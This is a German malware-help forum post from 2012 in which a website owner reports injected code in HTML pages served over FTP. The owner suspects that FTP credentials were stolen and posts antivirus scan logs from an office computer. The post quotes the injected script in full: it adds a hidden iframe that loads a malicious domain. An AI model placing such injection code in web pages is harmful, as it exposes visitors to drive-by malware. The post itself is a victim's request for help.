Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: Bürorechner

scherli · 20.08.2012, 14:05

So, ich poste jetzt nochmal aus dem alten Thema die Logs der beiden Rechner in jeweils eigenem Thread, damit niemand mit den Logs durcheinanderkommt.

Bevor ich hier zum Einstieg auch nochmal die Original-Problembeschreibung reinkopiere, möchte ich noch kurz die Vermutung äußern, dass da Ganze mit dem FTP-Client FlashFXP zu tun hat, von dem ich vor ein paar Jahren die Lizenz gekauft habe. Es scheinen nur Server betriffen zu sein, deren FTP-Daten dort gespeichert sind - nicht aber die, die ich in FireFTP im Firefox verwalte.

ORIGINAL-PROBLEMBESCHREIBUNG aus dem Thread http://www.trojaner-board.de/121065-...-trojaner.html

Code:

ATTFilter

Hallo zusammen,

ich sitze gerade ziemlich ratlos vor dem Rechner und erhoffe mir hier eine "Erleuchtung".

In einigen Webseiten - ausschließlich HTML-Dateien - auf die ich per FTP zugreife, hat sich der nachfolgende Code eingeschlichen, wegen dem zum einen Google Adwords die entsprechenden Kampagnen blockt und zum anderen Kunden Warnungen bekommen, dass die Seiten schädlich sind:

<body><!--c3284d--><script>var url="hxxp://online-alles.net";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibili ty: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d-->

Leider bin ich beim Googeln nicht weiter gekommen, denn die Verlinkung zu online-alles.net als Malware wird kaum thematisiert.

Auf Nachfrage beim Support des Providers HostEurope wurde ich darauf verwiesen, dass ich vermutlich einen Trojaner auf dem Rechner habe, der die FTP-Passwörter ausspioniert und es ermöglicht hat, dass der oben gepostete Code am 17.6.2012 in die HTML-Dateien eingefügt wurde. Als FTP-Client nutze ich hauptsächlich FlashFXP, zum anderen aber auch den Client von Firefox.

Ich habe mich hier am Board etwas umgeschaut und habe nun mit Malwarebytes sowohl den Laptop als auch den Bürorechner auf Trojaner gecheckt und wurde auch fündig. Nachfolgend poste ich die beiden Logfiles und hoffe, dass mir jemand sagen kann, was ich mir da eingefangen hatte und ob einer dieser Trojaner die Passwörter abgefangen haben könnte. Oder habe ich womöglch noch etwas auf dem Rechner, was Malwarebytes nicht gefunden hat?

Ich hatte zuvor schon, bevor ich auf dieses Forum gestoßen bin, mit TrojanHunter mein System gecheckt. Damit wurden angebliche Trojaner in alten Download-Dateien aus den Jahren 2007-2009 gefunden, die ich daraufhin gelöscht habe. Glaube aber nicht, dass sich die Auslöser drunter befunden haben.

Es wäre toll, wenn mir hier jemand hilfreich unter die Arme greifen könnte.

Schritt 1 - Malwarebytes Quick Scan:

Code:

ATTFilter

Malwarebytes Anti-Malware 1.62.0.1300
www.malwarebytes.org

Datenbank Version: v2012.08.02.07

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19272
Max Mustermann:: XXXX-OFFICE [Administrator]

02.08.2012 16:50:28
mbam-log-2012-08-02 (16-50-28).txt

Art des Suchlaufs: Quick-Scan
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 229011
Laufzeit: 9 Minute(n), 2 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Free Registry Cleaner for Vista_is1 (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 2
C:\Program Files\Free Registry Cleaner for Vista (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Dateien: 6
C:\Program Files\Free Registry Cleaner for Vista\backuphkcu.REG (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Program Files\Free Registry Cleaner for Vista\RegCleanerForVista.exe (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Program Files\Free Registry Cleaner for Vista\unins000.dat (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Program Files\Free Registry Cleaner for Vista\unins000.exe (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista\Free Registry Cleaner for Vista.lnk (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista\Uninstall Free Registry Cleaner for Vista.lnk (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt.

(Ende)

Schritt 2 - ESET Komplettscan:

Code:

ATTFilter

ESETSmartInstaller@High as CAB hook log:
OnlineScanner.ocx - registred OK
# version=7
# iexplore.exe=8.00.6001.18702 (longhorn_ie8_rtm(wmbla).090308-0339)
# OnlineScanner.ocx=1.0.0.6583
# api_version=3.0.2
# EOSSerial=4e095949c714694883166ebeaed138f6
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2012-08-08 10:39:51
# local_time=2012-08-08 12:39:51 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode=1280 16777215 100 0 0 0 0 0
# compatibility_mode=2304 16777215 100 0 0 0 0 0
# compatibility_mode=3584 16777215 100 0 0 0 0 0
# compatibility_mode=5892 16776573 100 100 59918 181943261 0 0
# compatibility_mode=8192 67108863 100 0 132 132 0 0
# scanned=333655
# found=3
# cleaned=0
# scan_time=11858
C:\downloads\Tools\Chopper XP\chopper.exe	möglicherweise unbekannter Virus NewHeur_PE Virus (Säubern nicht möglich)	00000000000000000000000000000000	I
C:\downloads\Tools\Chopper XP\chopper.zip	möglicherweise unbekannter Virus NewHeur_PE Virus (Säubern nicht möglich)	00000000000000000000000000000000	I
C:\downloads\Tools\FLV Converter\Setup59_FreeFlvConverter.exe	Mehrere Bedrohungen (Säubern nicht möglich)	00000000000000000000000000000000	I
# version=7
# iexplore.exe=8.00.6001.18702 (longhorn_ie8_rtm(wmbla).090308-0339)
# OnlineScanner.ocx=1.0.0.6583
# api_version=3.0.2
# EOSSerial=4e095949c714694883166ebeaed138f6
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2012-08-09 02:31:59
# local_time=2012-08-09 04:31:59 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode=1280 16777215 100 0 0 0 0 0
# compatibility_mode=2304 16777215 100 0 0 0 0 0
# compatibility_mode=3584 16777215 100 0 0 0 0 0
# compatibility_mode=5892 16776573 100 100 94554 181977897 0 0
# compatibility_mode=8192 67108863 100 0 34768 34768 0 0
# scanned=1893521
# found=3
# cleaned=0
# scan_time=34350
C:\downloads\Tools\Chopper XP\chopper.exe	probably unknown NewHeur_PE virus (unable to clean)	00000000000000000000000000000000	I
C:\downloads\Tools\Chopper XP\chopper.zip	probably unknown NewHeur_PE virus (unable to clean)	00000000000000000000000000000000	I
C:\downloads\Tools\FLV Converter\Setup59_FreeFlvConverter.exe	multiple threats (unable to clean)	00000000000000000000000000000000	I

Schritt 3 - Malwarebytes Komplettscan:

Code:

ATTFilter

Malwarebytes Anti-Malware 1.62.0.1300
www.malwarebytes.org

Datenbank Version: v2012.08.09.10

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19272
Max Mustermann :: MAX-OFFICE [Administrator]

09.08.2012 21:28:06
mbam-log-2012-08-09 (21-28-06).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|G:\|P:\|Q:\|)
Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM
Deaktivierte Suchlaufeinstellungen: P2P
Durchsuchte Objekte: 2104471
Laufzeit: 6 Stunde(n), 13 Minute(n), 40 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 1
C:\downloads\Tools\PantsOff\pantsoff.exe (PUP.Pantsoff.PasswordFinder) -> Erfolgreich gelöscht und in Quarantäne gestellt.

(Ende)

Heute morgen wurde mit eine Hardcopy einer Microsoft Security Essentials Warnmeldung weitergeleitet, die bei einer der immer noch Malware-versuchten Seiten angeschlagen hat. Dort wurde ein Trojan:JS/Iframe.BT erkannt. Vielleicht bringt uns das weiter?

Danke in jedem Fall schon mal für die Unterstützung!

Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: Bürorechner

Plagegeister aller Art und deren Bekämpfung: Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: Bürorechner

Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: Bürorechner

Ähnliche Themen: Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: Bürorechner